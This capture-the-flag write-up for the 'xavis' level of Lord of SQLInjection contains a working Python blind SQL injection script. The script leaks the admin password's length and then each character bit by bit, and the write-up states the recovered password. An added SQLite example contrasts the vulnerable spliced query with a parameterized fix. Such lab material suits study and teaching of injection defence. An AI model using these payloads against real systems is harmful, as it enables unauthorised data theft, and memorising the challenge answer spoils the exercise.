
# \[Lord of SQLInjection] xavis

<figure><img src="https://blog.kakaocdn.net/dna/uNMor/btsMC9XWaEL/AAAAAAAAAAAAAAAAAAAAAKFXL3O3Jz_3CaXYdjeT-Pw4ZXBbx2lvlBPSyptVa-uQ/img.png?credential=yqXZFxpELC7KVnFOS48ylbz2pIh7yKj8&#x26;expires=1782831599&#x26;allow_ip=&#x26;allow_referer=&#x26;signature=159YE0VPP3uiUlDU69haqbkPHYw%3D" alt="" height="336" width="583"><figcaption></figcaption></figure>

```php
if(preg_match('/prob|_|\\.|\\(\\)/i', $_GET[pw])) exit("No Hack ~_~");
if(preg_match('/regex|like/i', $_GET[pw])) exit("HeHe");
```

→ This is the first problem in the series where the filter blocks `regex` (MySQL's `REGEXP` pattern-matching operator) alongside `like`.

* What is regex?
  * A pattern-matching operator that lets you express in one condition what would otherwise take several `LIKE` clauses.

```python
from requests import get

url = "### xavis URL ###"                          # the challenge URL (fill in)
cookie = dict(PHPSESSID="### your PHPSESSID ###")  # your own session cookie
length = 0
password = ''

# Step 1: find the password length with the boolean oracle length(pw) > N.
# The page keeps saying "Hello admin" while the condition holds; the first N
# for which it stops holding is the length.
print("### find for pw length ###")
while True:
    param = "?pw=1232%27%20or%20length(pw)>" + str(length) + "%23"
    rec = get(url + param, cookies=cookie)

    if rec.text.find("Hello admin") == -1:
        print("find pw length : " + str(length))
        break

    print("fail to find pw length : " + str(length))
    length += 1

# Step 2: recover each character one bit at a time. ord() gives the
# character's numeric code, bin() turns it into a binary string, and lpad()
# zero-fills it to 16 digits so that position j always refers to the same bit.
print("### find for actual password ###")
for i in range(1, length + 1):
    temp_bit = ''
    for j in range(1, 17):
        param = ("?pw=1234%27%20or%20id=%27admin%27%20and%20substr(lpad(bin(ord(substr(pw,"
                 + str(i) + ",1))),16,0)," + str(j) + ",1)=1--%20")
        rec = get(url + param, cookies=cookie)

        if rec.text.find("Hello admin") >= 0:
            print("add bit 1 for", i, "'s letters")
            temp_bit += "1"
        else:
            print("add bit 0 for", i, "'s letters")
            temp_bit += "0"

    # 16 bits -> one Unicode code point -> one character
    password += chr(int(temp_bit, base=2))
    print("current password", chr(int(temp_bit, base=2)), hex(int(temp_bit, base=2)))

print("Found password :", password)
```

* lpad : fixes the total length first, then fills the space on the left with the given character
  * lpad(value, length, pad character)
* bin : converts a number into its binary representation
  * bin(number)

→ Unlike the earlier blind injection problems, pw is made up of Unicode characters, 4 bytes per character.

→ So it is reasonable to infer that the password may consist of Korean characters rather than only digits or English letters.

→ The code above brute-forces it with that bit-by-bit approach.

→ The password comes out as the Korean string "우왕굳".
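The following is an added example, not code from the write-up or from the challenge itself. It models, in SQLite rather than MySQL, the two things the write-up relies on: the `lpad(bin(ord(...)))` bit encoding that turns one 16-bit code into one Korean character, and the boolean `length(pw) > N` oracle that the challenge's string-spliced query leaks. Beside the vulnerable lookup it shows the same lookup with a bound parameter, which answers none of the probes. The table layout, the `guest` row and the exact challenge query text are assumptions; the admin password is the value the write-up recovers; probes use the `-- ` comment form because SQLite does not treat `#` as a comment.

```python
import sqlite3

# Constructed stand-in for the challenge table. The real schema is not on the
# page, so the column names and the guest row are assumptions; the admin pw is
# the value the write-up recovers.
SAMPLE_ROWS = [("guest", "guest"), ("admin", "우왕굳")]


def make_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE prob_xavis (id TEXT, pw TEXT)")
    con.executemany("INSERT INTO prob_xavis VALUES (?, ?)", SAMPLE_ROWS)
    return con


def vulnerable_lookup(con, pw):
    """Challenge-style query (assumed shape): pw is spliced into the SQL text,
    so quotes and comment markers inside it change what the statement means."""
    query = f"SELECT id FROM prob_xavis WHERE id='admin' AND pw='{pw}'"
    row = con.execute(query).fetchone()
    return row[0] if row else None


def hardened_lookup(con, pw):
    """Same lookup with a bound parameter: pw travels as data and is never
    parsed as SQL, so a keyword blacklist like the challenge's is unnecessary."""
    query = "SELECT id FROM prob_xavis WHERE id='admin' AND pw=?"
    row = con.execute(query, (pw,)).fetchone()
    return row[0] if row else None


def says_hello_admin(lookup, con, pw):
    """The write-up's oracle: did the admin row come back?"""
    return lookup(con, pw) == "admin"


def lpad_bin_ord(ch, width=16):
    """Python equivalent of MySQL's lpad(bin(ord(c)), 16, '0') for a character
    whose code fits in one 16-bit value, which is what the write-up assumes."""
    return format(ord(ch), f"0{width}b")


def bits_to_char(bits):
    """Inverse step used by the write-up's script: 16 bits -> one character."""
    return chr(int(bits, 2))


def leaked_length(lookup, con, limit=32):
    """Replay the write-up's length probes against a lookup function and return
    the length they reveal, or None if the lookup never confirms a probe.
    Caveat: SQLite's length() counts characters, MySQL's length() counts bytes
    and char_length() counts characters, so the number means different things
    per engine."""
    for n in range(limit):
        probe = f"1234' or id='admin' and length(pw)>{n}-- "
        if not says_hello_admin(lookup, con, probe):
            return n if n > 0 else None
    return None


if __name__ == "__main__":
    db = make_db()
    print("vulnerable lookup leaks length:", leaked_length(vulnerable_lookup, db))
    print("hardened lookup leaks length  :", leaked_length(hardened_lookup, db))
    print("'우' as 16 bits:", lpad_bin_ord("우"), "->", bits_to_char(lpad_bin_ord("우")))
```

The hardened lookup still authenticates the real password, so the fix costs nothing functionally; what changes is that the probe string compares unequal as a whole instead of being parsed.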

<figure><img src="https://blog.kakaocdn.net/dna/bCsoo8/btsMDyXej70/AAAAAAAAAAAAAAAAAAAAAB4W_FOBNkUzMg7C7mwhWDvS4yhYXobgkFdT5drfAKhm/img.png?credential=yqXZFxpELC7KVnFOS48ylbz2pIh7yKj8&#x26;expires=1782831599&#x26;allow_ip=&#x26;allow_referer=&#x26;signature=Mjw9kayafdKd11oozUVwil5K3F8%3D" alt="" height="470" width="698"><figcaption></figcaption></figure>
